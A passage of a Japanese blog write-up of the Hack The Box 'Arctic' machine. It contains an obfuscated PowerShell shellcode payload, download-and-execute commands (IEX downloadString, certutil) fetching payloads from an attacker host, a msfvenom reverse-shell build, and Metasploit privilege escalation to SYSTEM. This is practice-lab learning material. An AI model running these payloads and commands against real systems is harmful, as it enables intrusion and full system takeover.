s\"\"v IJi -;s\"\"v zx e\"\"c;s\"\"v Aac ((g\"\"v IJi).value.toString()+(g\"\"v zx).value.toString());powershell (g\"\"v Aac).value.toString() ('JABvAGcAPQAnACQAbgBtAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAeQBuAEEAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlACIAKwAiAGwAIgArACIAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABhAEMAcgAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQAiACsAIgBsACIAKwAiADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABoAHoAWAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAbgBtAD0AJABuAG0ALgByAGUAcABsAGEAYwBlACgAIgBhAEMAcgAiACwAIAAiAEMAcgBlAGEAdABlAFQAaAByACIAKwAiAGUAIgArACIAYQBkACIAKQA7ACQAbgBtAD0AJABuAG0ALgByAGUAcABsAGEAYwBlACgAIgB5AG4AQQAiACwAIAAiAGMAYQBsAGwAbwBjACIAKQA7ACQAdABSAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AMABhACwAfQAwAGEALAB9ADAAYwAsAH0AYwAyACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQA3AGEALAB9ADYAOQAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYwAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADYALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADU'+'AOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AZQBlACwAfQBjADMAIgA7ACQATgBqAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABuAG0AIAAtAE4AYQBtAGUAIAAiAHkAUQAiACAALQBuAGEAbQBlAHMAIABKAGUAYgA7ACQATgBqAD0AJABOAGoALgByAGUAcABsAGEAYwBlACgAIgBKAGUAYgAiACwAIAAiAFcAaQBuADMAMgBGAHUAbgBjAHQAaQAiACsAIgBvACIAKwAiAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJAB0AFIAIAA9ACAAJAB0AFIALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAGUAQgBzAEwAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBlAEIAcwBMACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABUAEEAPQAwAHgAMQAwADAAMgA7AGkAZgAgACgAJAB0AFIALgBMACAALQBnAHQAIAAwAHgAMQAwADAAMgApAHsAJABUAEEAPQAkAHQAUgAuAEwAfQA7ACQAZwBCAD0AJABOAGoAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADIALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGgAegBYACAAPQAgADAAOwBmAG8AcgAoACQAcABpAD0AMAA7ACQAcABpACAALQBsAGUAKAAkAHQAUgAuAEwAZQBuAGcAdABoAC0AMQApADsAJABwAGkAKwArACkAewAkAE4AagA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGcAQgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABwAGkAKQAsACAAJAB0AFIAWwAkAHAAaQBdACwAIAAxACkAfQA7ACQATgBqADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGcAQgAsACAAMAB4ADEAMAAwADIALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGgAegBYACkAOwAkAE4AagA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAB4ADAAMAAsACQAZwBCACwAMAAsADAALAAwACkAOwAnADsAJABoAHUAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAG8AZwApACkAOwAkAFYASQA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABCAHYAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAcgBhAGMAIAA9ACAAIgBDADoAXAAkAEIAdgBcAHMAeQBzAHcAbwB3ADYANABcACQAQgB2ACQAVgBJAFwAdgAxAC4AMABcACQAVgBJACIAOwAkAEMAYQBVACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEMAYQBVACcAKQB7ACQAVgBJAD0AIAAkAHIAYQBjAH0AOwAkAFUAVgA9ACIAIAAkAFYASQAgAHEAUgBoACAAJABoAHUAIgA7ACQAVQBWAD0AJABVAFYALgByAGUAcABsAGEAYwBlACgAIgBxAFIAaAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAFUAVgA=')

powershell_attack.txt からの変更点は ・一番後ろの " を抜く ・対応するはじめの方の " も抜く ・はじめの powershell /w 1 /C も抜く

です。

そして python で local サーバーを立てます。

$ python -m SimpleHTTPServer

unicorn.rc を使って msfconsole も立てておきます。

$ msfconsole -r unicorn.rc

そして先ほどのリバースシェルから exploit.html にアクセスしてその内容を実行します。

C:\ColdFusion8\runtime\bin> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/exploit.html')"

しかし

これがまあ失敗するんですわ… server は 200 でレスポンス返しているので、exploit.htmlがなんかミスってるか、unicorn の設定でミスったかなような気がするんですが、割としっかり目に見直しても原因がわかりませんでした…

作戦変更 → msfvenomを使う

msfvenomを使う

※ここから今まで LHOST=10.10.14.2 だったのが LHOST=10.10.14.13 に変わっています。

以下の writeup を参考にします。 Hack the Box Writeup: Arctic

[email protected]:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=9090 -f exe > arctic.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

[email protected]:~$ python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...

metaspoitで待ち受ける

[email protected]:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

      .:okOOOkdc'           'cdkOOOko:.                                                                                                                                        
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                                                                                                      
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                                                                                                     
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                                                                                                    
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo                                                                                                                                    
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx                                                                                                                                    
  lOOOOOOOO.         ;d;         ,OOOOOOOOl                                                                                                                                    
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.                                                                                                                                    
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc                                                                                                                                     
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo                                                                                                                                      
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl                                                                                                                                       
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;                                                                                                                                        
       .dOOo   .OOOOocccxOOOO.   xOOd.                                                                                                                                         
         ,kOl  .OOOOOOOOOOOOO. .dOk,                                                                                                                                           
           :kk;.OOOOOOOOOOOOO.cOk:                                                                                                                                             
             ;kOOOOOOOOOOOOOOOk:                                                                                                                                               
               ,xOOOOOOOOOOOx,                                                                                                                                                 
                 .lOOOOOOOl.                                                                                                                                                   
                    ,dOd,                                                                                                                                                      
                      .                                                                                                                                                        

       =[ metasploit v5.0.71-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lport 9090
lport => 9090
msf5 exploit(multi/handler) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf5 exploit(multi/handler) > exploit -j

以下とったリバースシェルで

C:\ColdFusion8\runtime\bin>certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

C:\ColdFusion8\runtime\bin>arctic.exe
arctic.exe

これでしばらくすると msfconsole で

[*] Meterpreter session 1 opened (10.10.14.13:9090 -> 10.10.10.11:49609) at 2020-02-19 10:40:51 -0500

このように反応が帰ってきます。

meterpreterのチェック

ちゃんと動くかチェックします。

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > load stdapi
Loading extension stdapi...meterpreter > 
meterpreter > sysinfo
Computer        : ARCTIC
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
Computer        : ARCTIC
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: ARCTIC\tolis
Server username: ARCTIC\tolis

完璧です

ここで Architecture は x64 になっているのに対し、Meterpreter は x86/windows となっていることに気がつきます。 これを揃えます。

プロセスを乗り移る

meterpreter > ps

Process List
============

 PID   PPID  Name                     Arch  Session  User          Path
 ---   ----  ----                     ----  -------  ----          ----
 0     0     [System Process]                                      
 4     0     System                                                
 236   4     smss.exe                                              
 328   308   csrss.exe                                             
 336   484   svchost.exe                                           
 372   308   wininit.exe                                           
 392   380   csrss.exe                                             
 436   380   winlogon.exe                                          
 484   372   services.exe                                          
 500   372   lsass.exe                                             
 508   372   lsm.exe                                               
 608   484   svchost.exe                                           
 680   484   svchost.exe                                           
 756   436   LogonUI.exe                                           
 764   484   svchost.exe                                           
 804   484   svchost.exe                                           
 840   484   spoolsv.exe                                           
 852   484   svchost.exe                                           
 908   484   svchost.exe                                           
 924   1832  arctic.exe               x86   0        ARCTIC\tolis  C:\ColdFusion8\runtime\bin\arctic.exe
 948   484   svchost.exe                                           
 1048  484   CF8DotNetsvc.exe                                      
 1092  1048  JNBDotNetSide.exe                                     
 1100  328   conhost.exe                                           
 1120  328   conhost.exe                                           
 1136  1312  k2server.exe                                          
 1148  484   jrunsvc.exe              x64   0        ARCTIC\tolis  C:\ColdFusion8\runtime\bin\jrunsvc.exe
 1176  1148  jrun.exe                 x64   0        ARCTIC\tolis  C:\ColdFusion8\runtime\bin\jrun.exe
 1184  484   swagent.exe                                           
 1192  328   conhost.exe              x64   0        ARCTIC\tolis  C:\Windows\System32\conhost.exe
 1224  484   swstrtr.exe                                           
 1236  1224  swsoc.exe                                             
 1244  328   conhost.exe                                           
 1312  484   k2admin.exe                                           
 1424  608   WmiPrvSE.exe                                          
 1456  484   svchost.exe                                           
 1512  484   VGAuthService.exe                                     
 1752  484   vmtoolsd.exe                                          
 1776  484   ManagementAgentHost.exe                               
 1832  1176  cmd.exe                  x64   0        ARCTIC\tolis  C:\Windows\System32\cmd.exe
 2092  1312  k2index.exe                                           
 2116  328   conhost.exe                                           
 3068  484   svchost.exe                                           
 3144  484   dllhost.exe                                           
 3304  484   msdtc.exe                                             
 3384  328   conhost.exe              x64   0        ARCTIC\tolis  C:\Windows\System32\conhost.exe
 3928  484   sppsvc.exe                                            

jrunsvc.exeに乗り移ります。

meterpreter > migrate 1148
[*] Migrating from 924 to 1148...
[*] Migration completed successfully.

psコマンド、migrateコマンドについて

ps プロセスの一覧を取得
migrate アクティブなプロセスに移動します。

The Ultimate Command Cheat Sheet for Metasploit’s Meterpreter Metasploit Post-Exploitation

suggesterを使う

suggester は この exploit 使えるんじゃね? みたいなのを調べてくれます

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester
                                                                                                                                                                               
Matching Modules                                                                                                                                                               
================                                                                                                                                                               
                                                                                                                                                                               
   #  Name                                      Disclosure Date  Rank    Check  Description                                                                                    
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 13 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

suggesterがおすすめしてくれたやつを実行

今回は exploit/windows/local/ms10092schelevator を使用します。 (色んな writeup で使われていたので)(a fairly common and reliable one らしいです)

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf5 exploit(windows/local/ms10_092_schelevator) > set lhost 10.10.14.13
msf5 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\saaKbk.exe
[*] Creating task: 1uBDeH8S
[*] SUCCESS: The scheduled task "1uBDeH8S" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\1uBDeH8S...
[*] Original CRC32: 0xffb3d93d
[*] Final CRC32: 0xffb3d93d
[*] Writing our modified content back...
[*] Validating task: 1uBDeH8S
[*] 
[*] Folder: \
[*] TaskName                                 Next Run Time          Status         
[*] ======================================== ====================== ===============
[*] 1uBDeH8S                                 1/3/2020 3:56:00 ��    Ready          
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "1uBDeH8S" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "1uBDeH8S" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (180291 bytes) to 10.10.10.11
[*] SUCCESS: Attempted to run the scheduled task "1uBDeH8S".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.13:4444 -> 10.10.10.11:50110) at 2020-02-19 12:58:37 -0500
[*] SUCCESS: The scheduled task "1uBDeH8S" was successfully deleted.
[*] SCHELEVATOR

meterpreter >

root.txtをとる

meterpreter > pwd
C:\Windows\system32
meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>more c:\\users\\administrator\\desktop\\root.txt

これで root.txt の内容が取れます!

終わりに

ちなみに user.txt をとり忘れていたのですが、似たような方法で取得できるので割愛します。

ひとつの machine 攻略でここまで多くのことを学べるとは思っていませんでした。これから精進していきます。

訂正やアドバイスなどがあればコメントか Twitter にお願いします! さんぽし(@sanpo_shiho) | Twitter

このエントリーをはてなブックマークに追加